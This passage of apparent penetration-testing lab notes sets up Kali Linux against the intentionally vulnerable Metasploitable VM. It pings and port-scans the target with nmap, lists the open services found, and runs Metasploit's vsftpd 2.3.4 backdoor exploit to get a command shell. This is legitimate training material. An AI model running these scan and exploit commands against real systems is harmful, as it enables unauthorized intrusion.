You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ifconfig # run this in both systems
192.168.56.101 Kali
192.168.56.102 Metasploitable
7. verify networking is setup
ping Kali -> Metasploitable
ping Metasploitable -> Kali
8. verify running services in Metasploitable
# Metasploitable
sudo netstat -tunlp | less
9. port scan Metasploitable
# Kali Linux
nmap -p0-65535 <metasploitable_ip>
nmap -sV -p0-65535 <metasploitable_ip>
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)111/tcp open rpcbind 2 (RPC #100000)139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)512/tcp open exec netkit-rsh rexecd513/tcp open login514/tcp open shell Netkit rshd1099/tcp open rmiregistry GNU Classpath grmiregistry1524/tcp open shell Metasploitable root shell2049/tcp open nfs 2-4 (RPC #100003)2121/tcp open ftp ProFTPD 1.3.13306/tcp open mysql MySQL 5.0.51a-3ubuntu53632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34929/tcp open mountd 1-3 (RPC #100005)
47746/tcp open unknown
49161/tcp open status 1 (RPC #100024)
57689/tcp open nlockmgr 1-4 (RPC #100021)
10. configure Metasploitable
# startup Metasploit within Kali Linux, click the icon in the left-side dock
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payload cmd/unix/interact
show options
set RHOST <metasploitable_ip>set RPORT 21
exploit
nice